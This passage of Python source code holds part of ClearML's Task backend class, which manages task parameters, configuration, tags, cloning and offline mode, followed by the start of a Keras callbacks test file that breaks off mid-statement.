if not update and prefix: parameters = copy(self.get_parameters() or {}) parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/')) elif update: parameters = copy(self.get_parameters() or {}) else: parameters = dict() parameters.update(new_parameters) # force cast all variables to strings (so that we can later edit them in UI) parameters = {k: stringify(v) for k, v in parameters.items()} if use_hyperparams: # build nested dict from flat parameters dict: org_hyperparams = self.data.hyperparams or {} hyperparams = dict() # if the task is a legacy task, we should put everything back under Args/key with legacy type legacy_name = self._legacy_parameters_section_name org_legacy_section = org_hyperparams.get(legacy_name, dict()) for k, v in parameters.items(): # legacy variable if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy': section = hyperparams.get(legacy_name, dict()) section[k] = copy(org_legacy_section[k]) section[k].value = str(v) if v else v description = descriptions.get(k) if description: section[k].description = description hyperparams[legacy_name] = section continue org_k = k if '/' not in k: k = '{}/{}'.format(self._default_configuration_section_name, k) section_name, key = k.split('/', 1) section = hyperparams.get(section_name, dict()) org_param = org_hyperparams.get(section_name, dict()).get(key, tasks.ParamsItem()) param_type = params_types[org_k] if org_k in params_types else org_param.type if param_type and not isinstance(param_type, str): param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type) section[key] = tasks.ParamsItem( section=section_name, name=key, value=str(v) if v else v, description=descriptions[org_k] if org_k in descriptions else org_param.description, type=param_type, ) hyperparams[section_name] = section self._edit(hyperparams=hyperparams) self.data.hyperparams = hyperparams else: execution = self.data.execution if execution is None: execution = tasks.Execution( parameters=parameters, artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, docker_cmd='') else: execution.parameters = parameters self._edit(execution=execution) def set_parameter(self, name, value, description=None, value_type=None): # type: (str, str, Optional[str], Optional[Any]) -> () """ Set a single Task parameter. This overrides any previous value for this parameter. :param name: The parameter name. :param value: The parameter value. :param description: The parameter description. :param value_type: The type of the parameters (cast to string and store) """ if not Session.check_min_api_version('2.9'): # not supported yet description = None value_type = None self._set_parameters( {name: value}, __update=True, __parameters_descriptions={name: description}, __parameters_types={name: value_type} ) def get_parameter(self, name, default=None): # type: (str, Any) -> Any """ Get a value for a parameter. :param name: Parameter name :param default: Default value :return: The Parameter value (or default value if parameter is not defined). """ params = self.get_parameters() return params.get(name, default) def delete_parameter(self, name): # type: (str) -> bool """ Delete a parameter byt it's full name Section/name. :param name: Parameter name in full, i.e. Section/name. 
For example, 'Args/batch_size' :return: True if the parameter was deleted successfully """ if not Session.check_min_api_version('2.9'): raise ValueError("Delete hyper parameter is not supported by your clearml-server, " "upgrade to the latest version") with self._edit_lock: paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1]) res = self.send(tasks.DeleteHyperParamsRequest( task=self.id, hyperparams=[paramkey]), raise_on_errors=False) self.reload() return res.ok() def update_parameters(self, *args, **kwargs): # type: (*dict, **Any) -> () """ Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does not support parameter descriptions (the input is a dictionary of key-value pairs). Notice the parameter dict is flat: i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value" :param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are merged into a single key-value pair dictionary. :param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``. """ self._set_parameters(*args, __update=True, **kwargs) def set_model_label_enumeration(self, enumeration=None): # type: (Mapping[str, int]) -> () """ Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)} :param dict enumeration: For example: {str(label): integer(id)} """ enumeration = enumeration or {} with self._edit_lock: self.reload() execution = self.data.execution if enumeration is None: return if not (isinstance(enumeration, dict) and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())): raise ValueError('Expected label to be a dict[str => int]') execution.model_labels = enumeration self._edit(execution=execution) def _set_default_docker_image(self): # type: () -> () if not DOCKER_IMAGE_ENV_VAR.exists(): return self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default="")) def set_base_docker(self, docker_cmd): # type: (str) -> () """ Set the base docker image for this experiment If provided, this value will be used by clearml-agent to execute this experiment inside the provided docker image. 
When running remotely the call is ignored """ if not self.running_locally(): return with self._edit_lock: self.reload() execution = self.data.execution execution.docker_cmd = docker_cmd self._edit(execution=execution) def get_base_docker(self): # type: () -> str """Get the base Docker command (image) that is set for this experiment.""" return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False) def set_artifacts(self, artifacts_list=None): # type: (Sequence[tasks.Artifact]) -> () """ List of artifacts (tasks.Artifact) to update the task :param list artifacts_list: list of artifacts (type tasks.Artifact) """ if not Session.check_min_api_version('2.3'): return False if not (isinstance(artifacts_list, (list, tuple)) and all(isinstance(a, tasks.Artifact) for a in artifacts_list)): raise ValueError('Expected artifacts to [tasks.Artifacts]') with self._edit_lock: self.reload() execution = self.data.execution keys = [a.key for a in artifacts_list] execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list self._edit(execution=execution) def _set_model_design(self, design=None): # type: (str) -> () with self._edit_lock: self.reload() if Session.check_min_api_version('2.9'): configuration = self._get_task_property( "configuration", default={}, raise_on_error=False, log_on_error=False) or {} configuration[self._default_configuration_section_name] = tasks.ConfigurationItem( name=self._default_configuration_section_name, value=str(design)) self._edit(configuration=configuration) else: execution = self.data.execution if design is not None: # noinspection PyProtectedMember execution.model_desc = Model._wrap_design(design) self._edit(execution=execution) def get_labels_enumeration(self): # type: () -> Mapping[str, int] """ Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs. :return: A dictionary containing the label enumeration. """ if not self.data or not self.data.execution: return {} return self.data.execution.model_labels def get_model_design(self): # type: () -> str """ Get the model configuration as blob of text. :return: The model configuration as blob of text. """ if Session.check_min_api_version('2.9'): design = self._get_task_property( "configuration", default={}, raise_on_error=False, log_on_error=False) or {} if design: design = design.get(sorted(design.keys())[0]).value or '' else: design = self._get_task_property( "execution.model_desc", default={}, raise_on_error=False, log_on_error=False) # noinspection PyProtectedMember return Model._unwrap_design(design) def set_output_model_id(self, model_id): # type: (str) -> () self.data.output.model = str(model_id) self._edit(output=self.data.output) def get_random_seed(self): # type: () -> int # fixed seed for the time being return 1337 def set_random_seed(self, random_seed): # type: (int) -> () # fixed seed for the time being pass def set_project(self, project_id=None, project_name=None): # type: (Optional[str], Optional[str]) -> () # if running remotely and we are the main task, skip setting ourselves. 
if self._is_remote_main_task(): return if not project_id: assert isinstance(project_name, six.string_types) res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False) if not res or not res.response or not res.response.projects or len(res.response.projects) != 1: return False project_id = res.response.projects[0].id assert isinstance(project_id, six.string_types) self._set_task_property("project", project_id) self._edit(project=project_id) def get_project_name(self): # type: () -> Optional[str] if self.project is None: return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project: return self._project_name[1] res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False) if not res or not res.response or not res.response.project: return None self._project_name = (self.project, res.response.project.name) return self._project_name[1] def get_tags(self): # type: () -> Sequence[str] return self._get_task_property("tags") def set_system_tags(self, tags): # type: (Sequence[str]) -> () assert isinstance(tags, (list, tuple)) if Session.check_min_api_version('2.3'): self._set_task_property("system_tags", tags) self._edit(system_tags=self.data.system_tags) else: self._set_task_property("tags", tags) self._edit(tags=self.data.tags) def get_system_tags(self): # type: () -> Sequence[str] return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags") def set_tags(self, tags): # type: (Sequence[str]) -> () assert isinstance(tags, (list, tuple)) if not Session.check_min_api_version('2.3'): # not supported return self._set_task_property("tags", tags) self._edit(tags=self.data.tags) def set_name(self, name): # type: (str) -> () """ Set the Task name. :param name: The name of the Task. :type name: str """ self._set_task_property("name", str(name)) self._edit(name=self.data.name) def set_parent(self, parent): # type: (Optional[Union[str, Task]]) -> () """ Set the parent task for the Task. :param parent: The parent task id (or parent Task object) for the Task. Set None for no parent. :type parent: str or Task """ if parent: assert isinstance(parent, (str, Task)) if isinstance(parent, Task): parent = parent.parent assert parent != self.id self._set_task_property("parent", str(parent) if parent else None) self._edit(parent=self.data.parent) def set_comment(self, comment): # type: (str) -> () """ Set a comment / description for the Task. :param comment: The comment / description for the Task. :type comment: str """ self._set_task_property("comment", str(comment)) self._edit(comment=comment) def set_task_type(self, task_type): # type: (Union[str, Task.TaskTypes]) -> () """ Set the task_type for the Task. :param task_type: The task_type of the Task (see optional values in TaskTypes). :type task_type: str or TaskTypes """ if not isinstance(task_type, self.TaskTypes): task_type = self.TaskTypes(task_type) self._set_task_property("task_type", str(task_type)) self._edit(type=task_type) def set_archived(self, archive): # type: (bool) -> () """ Archive the Task or remove it from the archived folder. 
:param archive: If True archive the Task, If False make sure it is removed from the archived folder """ with self._edit_lock: system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \ if archive else list(set(self.get_system_tags()) - {self.archived_tag}) self.set_system_tags(system_tags) def get_archived(self): # type: () -> bool """ Return the Archive state of the Task :return: If True the Task is archived, otherwise it is not. """ return self.archived_tag in self.get_system_tags() def set_initial_iteration(self, offset=0): # type: (int) -> int """ Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training from previous checkpoints. For example, to start on iteration 100000, including scalars and plots: ..code-block:: py task.set_initial_iteration(100000) Task.set_initial_iteration(100000) :param int offset: Initial iteration (at starting point) :return: A newly set initial offset. """ if not isinstance(offset, int): raise ValueError("Initial iteration offset must be an integer") self._initial_iteration_offset = offset if self._metrics_manager: self._metrics_manager.set_iteration_offset(self._initial_iteration_offset) return self._initial_iteration_offset def get_initial_iteration(self): # type: () -> int """ Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training from previous checkpoints. :return: The initial iteration offset. """ return self._initial_iteration_offset def get_status(self): # type: () -> str """ Return The task status without refreshing the entire Task object object (only the status property) TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed", "queued", "published", "publishing", "unknown"] :return: str: Task status as string (TaskStatusEnum) """ status = self._get_status()[0] if self._data: self._data.status = status return str(status) def get_output_log_web_page(self): # type: () -> str """ Return the Task results & outputs web page address. For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log :return: http/s URL link. """ return '{}/projects/{}/experiments/{}/output/log'.format( self._get_app_server(), self.project if self.project is not None else '*', self.id, ) def get_reported_scalars( self, max_samples=0, # type: int x_axis='iter' # type: str ): # type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]] """ Return a nested dictionary for the scalar graphs, where the first key is the graph title and the second is the series name. Value is a dict with 'x': values and 'y': values .. note:: This call is not cached, any call will retrieve all the scalar reports from the back-end. If the Task has many scalars reported, it might take long for the call to return. Example: .. code-block:: py {'title': {'series': { 'x': [0, 1 ,2], 'y': [10, 11 ,12], }}} :param int max_samples: Maximum samples per series to return. Default is 0 returning all scalars. With sample limit, average scalar values inside sampling window. 
:param str x_axis: scalar x_axis, possible values: 'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time :return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]] """ if x_axis not in ('iter', 'timestamp', 'iso_time'): raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'") # send request res = self.send( events.ScalarMetricsIterHistogramRequest( task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None), raise_on_errors=False, ignore_errors=True, ) if not res: return {} response = res.wait() if not response.ok() or not response.response_data: return {} return response.response_data def get_reported_console_output(self, number_of_reports=1): # type: (int) -> Sequence[str] """ Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs. :param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the last (most updated) console output :return: A list of strings, each entry corresponds to one report. """ if Session.check_min_api_version('2.9'): request = events.GetTaskLogRequest( task=self.id, order='asc', navigate_earlier=True, batch_size=number_of_reports) else: request = events.GetTaskLogRequest( task=self.id, order='asc', from_='tail', batch_size=number_of_reports) res = self.send(request) response = res.wait() if not response.ok() or not response.response_data.get('events'): return [] lines = [r.get('msg', '') for r in response.response_data['events']] return lines def get_configuration_object(self, name): # type: (str) -> Optional[str] """ Get the Task's configuration object section as a blob of text Use only for automation (externally), otherwise use `Task.connect_configuration`. :param str name: Configuration section name :return: The Task's configuration as a text blob (unconstrained text string) return None if configuration name is not valid """ return self._get_configuration_text(name) def set_configuration_object(self, name, config_text=None, description=None, config_type=None): # type: (str, Optional[str], Optional[str], Optional[str]) -> None """ Set the Task's configuration object as a blob of text. Use only for automation (externally), otherwise use `Task.connect_configuration`. :param str name: Configuration section name :param config_text: configuration as a blob of text (unconstrained text string) usually the content of a configuration file of a sort :param str description: Configuration section description :param str config_type: Optional configuration format type """ return self._set_configuration( name=name, description=description, config_type=config_type, config_text=config_text) @classmethod def get_projects(cls): # type: () -> (List['projects.Project']) """ Return a list of projects in the system, sorted by last updated time :return: A list of all the projects in the system. Each entry is a `services.projects.Project` object. """ res = cls._send( cls._get_default_session(), projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True) if res and res.response and res.response.projects: return [projects.Project(**p.to_dict()) for p in res.response.projects] return [] @classmethod def get_project_id(cls, project_name): # type: (str) -> Optional[str] """ Return a the project unique id (str). 
If for than one project match the project_name, return the last updated project If no project matched the requested name, returns None :return: Project unique ID (str), or None if no project was found. """ assert project_name assert isinstance(project_name, str) res = cls._send( cls._get_default_session(), projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)), raise_on_errors=False) if res and res.response and res.response.projects: return [projects.Project(**p.to_dict()).id for p in res.response.projects][0] return None @staticmethod def running_locally(): # type: () -> bool """ Is the task running locally (i.e., ``clearml-agent`` is not executing it) :return: True, if the task is running locally. False, if the task is not running locally. """ return not running_remotely() @classmethod def add_requirements(cls, package_name, package_version=None): # type: (str, Optional[str]) -> () """ Force the adding of a package to the requirements list. If ``package_version`` is not specified, use the installed package version, if found. Example: Task.add_requirements('tensorflow', '2.4.0') :param str package_name: The package name to add to the "Installed Packages" section of the task. :param package_version: The package version requirements. If ``None``, then use the installed version. """ cls._force_requirements[package_name] = package_version def _get_models(self, model_type='output'): # type: (str) -> Sequence[Model] # model_type is either 'output' or 'input' model_type = model_type.lower().strip() assert model_type == 'output' or model_type == 'input' if model_type == 'input': regex = r'((?i)(Using model id: )(\w+)?)' compiled = re.compile(regex) ids = [i[-1] for i in re.findall(compiled, self.comment)] + ( [self.input_model_id] if self.input_model_id else []) # remove duplicates and preserve order ids = list(OrderedDict.fromkeys(ids)) from ...model import Model as TrainsModel in_model = [] for i in ids: m = TrainsModel(model_id=i) # noinspection PyBroadException try: # make sure the model is is valid # noinspection PyProtectedMember m._get_model_data() in_model.append(m) except Exception: pass return in_model else: res = self.send( models.GetAllRequest( task=[self.id], order_by=['created'], only_fields=['id'] ) ) if not res.response.models: return [] ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else []) # remove duplicates and preserve order ids = list(OrderedDict.fromkeys(ids)) from ...model import Model as TrainsModel return [TrainsModel(model_id=i) for i in ids] def _get_default_report_storage_uri(self): # type: () -> str if self._offline_mode: return str(self.get_offline_mode_folder() / 'data') if not self._files_server: self._files_server = Session.get_files_server_host() return self._files_server def _get_status(self): # type: () -> (Optional[str], Optional[str]) if self._offline_mode: return tasks.TaskStatusEnum.created, 'offline' # noinspection PyBroadException try: all_tasks = self.send( tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']), ).response.tasks return all_tasks[0].status, all_tasks[0].status_message except Exception: return None, None def _reload_last_iteration(self): # type: () -> () # noinspection PyBroadException try: all_tasks = self.send( tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']), ).response.tasks self.data.last_iteration = all_tasks[0].last_iteration except Exception: return None def _clear_task(self, system_tags=None, comment=None): # type: 
(Optional[Sequence[str]], Optional[str]) -> () self._data.script = tasks.Script( binary='', repository='', tag='', branch='', version_num='', entry_point='', working_dir='', requirements={}, diff='', ) self._data.execution = tasks.Execution( artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='') self._data.comment = str(comment) self._storage_uri = None self._data.output.destination = self._storage_uri self._update_requirements('') if Session.check_min_api_version('2.9'): self._set_task_property("system_tags", system_tags) self._edit(system_tags=self._data.system_tags, comment=self._data.comment, script=self._data.script, execution=self._data.execution, output_dest='', hyperparams=dict(), configuration=dict()) elif Session.check_min_api_version('2.3'): self._set_task_property("system_tags", system_tags) self._edit(system_tags=self._data.system_tags, comment=self._data.comment, script=self._data.script, execution=self._data.execution, output_dest='') else: self._set_task_property("tags", system_tags) self._edit(tags=self._data.tags, comment=self._data.comment, script=self._data.script, execution=self._data.execution, output_dest=None) @classmethod def _get_api_server(cls): # type: () -> () return Session.get_api_server_host() def _get_app_server(self): # type: () -> str if not self._app_server: self._app_server = Session.get_app_server_host() return self._app_server def _is_remote_main_task(self): # type: () -> bool """ :return: return True if running remotely and this Task is the registered main task """ return running_remotely() and get_remote_task_id() == self.id def _edit(self, **kwargs): # type: (**Any) -> Any with self._edit_lock: if self._offline_mode: for k, v in kwargs.items(): setattr(self.data, k, v) Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True) with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f: export_data = self.data.to_dict() export_data['project_name'] = self.get_project_name() export_data['offline_folder'] = self.get_offline_mode_folder().as_posix() json.dump(export_data, f, ensure_ascii=True, sort_keys=True) return None # Since we ae using forced update, make sure he task status is valid status = self._data.status if self._data and self._reload_skip_flag else self.data.status if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress): # the exception being name/comment that we can always change. 
if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags') for k in kwargs.keys()): pass else: raise ValueError('Task object can only be updated if created or in_progress') res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False) return res def _update_requirements(self, requirements): # type: (Union[dict, str]) -> () if not isinstance(requirements, dict): requirements = {'pip': requirements} # protection, Old API might not support it # noinspection PyBroadException try: with self._edit_lock: self.reload() self.data.script.requirements = requirements if self._offline_mode: self._edit(script=self.data.script) else: self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements)) except Exception: pass def _update_script(self, script): # type: (dict) -> () with self._edit_lock: self.reload() self.data.script = script self._edit(script=script) def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None): # type: (str, Optional[str], Optional[str], Optional[str], Optional[Mapping]) -> None """ Set Task configuration text/dict. Multiple configurations are supported. :param str name: Configuration name. :param str description: Configuration section description. :param str config_type: Optional configuration format type (str). :param config_text: model configuration (unconstrained text string). usually the content of a configuration file. If `config_text` is not None, `config_dict` must not be provided. :param config_dict: model configuration parameters dictionary. If `config_dict` is not None, `config_text` must not be provided. """ # make sure we have wither dict or text mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True) if not Session.check_min_api_version('2.9'): raise ValueError("Multiple configurations is not supported with the current 'clearml-server', " "please upgrade to the latest version") if description: description = str(description) # support empty string a_config = config_dict_to_text(config_dict if config_text is None else config_text) with self._edit_lock: self.reload() configuration = self.data.configuration or {} configuration[name] = tasks.ConfigurationItem( name=name, value=a_config, description=description or None, type=config_type or None) self._edit(configuration=configuration) def _get_configuration_text(self, name): # type: (str) -> Optional[str] """ Get Task configuration section as text :param str name: Configuration name. :return: The Task configuration as text (unconstrained text string). return None if configuration name is not valid. """ if not Session.check_min_api_version('2.9'): raise ValueError("Multiple configurations is not supported with the current 'clearml-server', " "please upgrade to the latest version") configuration = self.data.configuration or {} if not configuration.get(name): return None return configuration[name].value def _get_configuration_dict(self, name): # type: (str) -> Optional[dict] """ Get Task configuration section as dictionary :param str name: Configuration name. :return: The Task configuration as dictionary. return None if configuration name is not valid. """ config_text = self._get_configuration_text(name) if not config_text: return None return text_to_config_dict(config_text) def get_offline_mode_folder(self): # type: () -> (Optional[Path]) """ Return the folder where all the task outputs and logs are stored in the offline session. 
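
        For example (illustrative; returns None unless offline mode is enabled):

        .. code-block:: py

            folder = task.get_offline_mode_folder()
            if folder:
                print(folder.as_posix())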
:return: Path object, local folder, later to be used with `report_offline_session()` """ if not self._offline_mode: return None return get_offline_dir(task_id=self.task_id) @classmethod def _clone_task( cls, cloned_task_id, # type: str name=None, # type: Optional[str] comment=None, # type: Optional[str] execution_overrides=None, # type: Optional[dict] tags=None, # type: Optional[Sequence[str]] parent=None, # type: Optional[str] project=None, # type: Optional[str] log=None, # type: Optional[logging.Logger] session=None, # type: Optional[Session] ): # type: (...) -> str """ Clone a task :param str cloned_task_id: Task ID for the task to be cloned :param str name: New for the new task :param str comment: Optional comment for the new task :param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution section, useful for overriding values in the cloned task. :param list tags: Optional updated model tags :param str parent: Optional parent Task ID of the new task. :param str project: Optional project ID of the new task. If None, the new task will inherit the cloned task's project. :param logging.Logger log: Log object used by the infrastructure. :param Session session: Session object used for sending requests to the API :return: The new tasks's ID. """ session = session if session else cls._get_default_session() use_clone_api = Session.check_min_api_version('2.9') if use_clone_api: res = cls._send( session=session, log=log, req=tasks.CloneRequest( task=cloned_task_id, new_task_name=name, new_task_tags=tags, new_task_comment=comment, new_task_parent=parent, new_task_project=project, execution_overrides=execution_overrides, ) ) cloned_task_id = res.response.id return cloned_task_id res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id)) task = res.response.task output_dest = None if task.output: output_dest = task.output.destination execution = task.execution.to_dict() if task.execution else {} execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution), ConfigFactory.from_dict(execution_overrides or {})) # clear all artifacts execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input'] if not hasattr(task, 'system_tags') and not tags and task.tags: tags = [t for t in task.tags if t != cls._development_tag] extra = {} if hasattr(task, 'hyperparams'): extra['hyperparams'] = task.hyperparams if hasattr(task, 'configuration'): extra['configuration'] = task.configuration if getattr(task, 'system_tags', None): extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)] req = tasks.CreateRequest( name=name or task.name, type=task.type, input=task.input if hasattr(task, 'input') else {'view': {}}, tags=tags, comment=comment if comment is not None else task.comment, parent=parent, project=project if project else task.project, output_dest=output_dest, execution=execution.as_plain_ordered_dict(), script=task.script, **extra ) res = cls._send(session=session, log=log, req=req) cloned_task_id = res.response.id if task.script and task.script.requirements: cls._send(session=session, log=log, req=tasks.SetRequirementsRequest( task=cloned_task_id, requirements=task.script.requirements)) return cloned_task_id @classmethod def get_all(cls, session=None, log=None, **kwargs): # type: (Optional[Session], Optional[logging.Logger], **Any) -> Any """ List all the Tasks based on specific projection. 
:param Session session: The session object used for sending requests to the API. :param logging.Logger log: The Log object. :param kwargs: Keyword args passed to the GetAllRequest (see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`) For example: .. code-block:: bash status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id' :type kwargs: dict :return: The API response. """ session = session if session else cls._get_default_session() req = tasks.GetAllRequest(**kwargs) res = cls._send(session=session, req=req, log=log) return res @classmethod def get_by_name(cls, task_name): # type: (str) -> Task res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name))) task = get_single_result(entity='task', query=task_name, results=res.response.tasks) return cls(task_id=task.id) @classmethod def _get_project_name(cls, project_id): res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False) if not res or not res.response or not res.response.project: return None return res.response.project.name def _get_all_events( self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url") ): # type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]] """ Get a list of all reported events. Warning: Debug only. Do not use outside of testing. :param max_events: The maximum events the function will return. Pass None to return all the reported events. :param batch_size: The maximum number of events retrieved by each internal call performed by this method. :param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending. :param event_type: Event type. Pass None to get all event types. :param unique_selector: If provided, used to select a value from each event, only a unique set of these values will be returned by this method. :return: A list of events from the task. If unique_selector was provided, a set of values selected from events of the task. 
""" batch_size = max_events or batch_size log_events = self.send(events.GetTaskEventsRequest( task=self.id, order=order, batch_size=batch_size, event_type=event_type, )) returned_count = log_events.response.returned total_events = log_events.response.total scroll = log_events.response.scroll_id if unique_selector: events_list = set(map(unique_selector, log_events.response.events)) else: events_list = log_events.response.events while returned_count < total_events and (max_events is None or len(events_list) < max_events): log_events = self.send(events.GetTaskEventsRequest( task=self.id, order=order, batch_size=batch_size, event_type=event_type, scroll_id=scroll, )) scroll = log_events.response.scroll_id returned_count += log_events.response.returned if unique_selector: events_list.update(log_events.response.events) else: events_list.extend(log_events.response.events) return events_list @property def _edit_lock(self): # type: () -> () # skip the actual lock, this one-time lock will always enter # only used on shutdown process to avoid deadlocks if self.__edit_lock is False: return RLock() if self.__edit_lock: return self.__edit_lock if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2: self.__edit_lock = RLock() elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id): filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id)) # no need to remove previous file lock if we have a dead process, it will automatically release the lock. # # noinspection PyBroadException # try: # os.unlink(filename) # except Exception: # pass # create a new file based lock self.__edit_lock = FileRLock(filename=filename) else: self.__edit_lock = RLock() return self.__edit_lock @_edit_lock.setter def _edit_lock(self, value): # type: (RLock) -> () self.__edit_lock = value @classmethod def __update_master_pid_task(cls, pid=None, task=None): # type: (Optional[int], Union[str, Task]) -> () pid = pid or os.getpid() if not task: PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':') elif isinstance(task, str): PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task) else: # noinspection PyUnresolvedReferences PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id)) # make sure we refresh the edit lock next time we need it, task._edit_lock = None @classmethod def __get_master_id_task_id(cls): # type: () -> Optional[str] master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':') # we could not find a task ID, revert to old stub behaviour if len(master_task_id) < 2 or not master_task_id[1]: return None return master_task_id[1] @classmethod def __is_subprocess(cls): # type: () -> bool # notice this class function is called from Task.ExitHooks, do not rename/move it. is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \ PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid()) return is_subprocess @classmethod def set_offline(cls, offline_mode=False): # type: (bool) -> () """ Set offline mode, where all data and logs are stored into local folder, for later transmission :param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled. :return: """ if not running_remotely(): ENV_OFFLINE_MODE.set(offline_mode) InterfaceBase._offline_mode = bool(offline_mode) Session._offline_mode = bool(offline_mode) @classmethod def is_offline(cls): # type: () -> bool """ Return offline-mode state, If in offline-mode, no communication to the backend is enabled. 
        :return: boolean offline-mode state
        """
        return cls._offline_mode

    @classmethod
    def _get_task_status(cls, task_id):
        # type: (str) -> (Optional[str], Optional[str])
        if cls._offline_mode:
            return tasks.TaskStatusEnum.created, 'offline'

        # noinspection PyBroadException
        try:
            all_tasks = cls._get_default_session().send(
                tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']),
            ).response.tasks
            return all_tasks[0].status, all_tasks[0].status_message
        except Exception:
            return None, None
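
# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# A minimal, hedged example of the offline-mode helpers defined above. It assumes the
# public entry point `clearml.Task` (with `Task.init`) wraps this class; that wiring is
# an assumption based on the ClearML package layout rather than on this file alone.
if __name__ == '__main__':  # pragma: no cover - illustration only
    from clearml import Task

    Task.set_offline(True)                      # route all data/logs to a local folder
    task = Task.init(project_name='examples', task_name='offline run')
    print('offline mode:', Task.is_offline())
    print('offline folder:', task.get_offline_mode_folder())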
test_callbacks.py
import os import multiprocessing import numpy as np import pytest from numpy.testing import assert_allclose from csv import reader from csv import Sniffer import shutil from keras import optimizers from keras import initializers from keras import callbacks from keras.models import Sequential, Model from keras.layers import Input, Dense, Dropout, add, dot, Lambda, Layer from keras.layers.convolutional import Conv2D from keras.layers.pooling import MaxPooling2D from keras.layers.pooling import GlobalAveragePooling1D from keras.layers.pooling import GlobalAveragePooling2D from keras.utils.test_utils import get_test_data from keras.utils.test_utils import keras_test from keras import backend as K from keras.utils import np_utils try: from unittest.mock import patch except: from mock import patch input_dim = 2 num_hidden = 4 num_classes = 2 batch_size = 5 train_samples = 20 test_samples = 20 @keras_test def test_TerminateOnNaN(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [callbacks.TerminateOnNaN()] model = Sequential() initializer = initializers.Constant(value=1e5) for _ in range(5): model.add(Dense(num_hidden, input_dim=input_dim, activation='relu', kernel_initializer=initializer)) model.add(Dense(num_classes, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') # case 1 fit history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) == 1 assert loss[0] == np.inf # case 2 fit_generator def data_generator(): max_batch_index = len(X_train) // batch_size i = 0 while 1: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index history = model.fit_generator(data_generator(), len(X_train), validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) == 1 assert loss[0] == np.inf or np.isnan(loss[0]) @keras_test def test_stop_training_csv(tmpdir): np.random.seed(1337) fp = str(tmpdir / 'test.csv') (X_train, y_train), (X_test, y_test) = 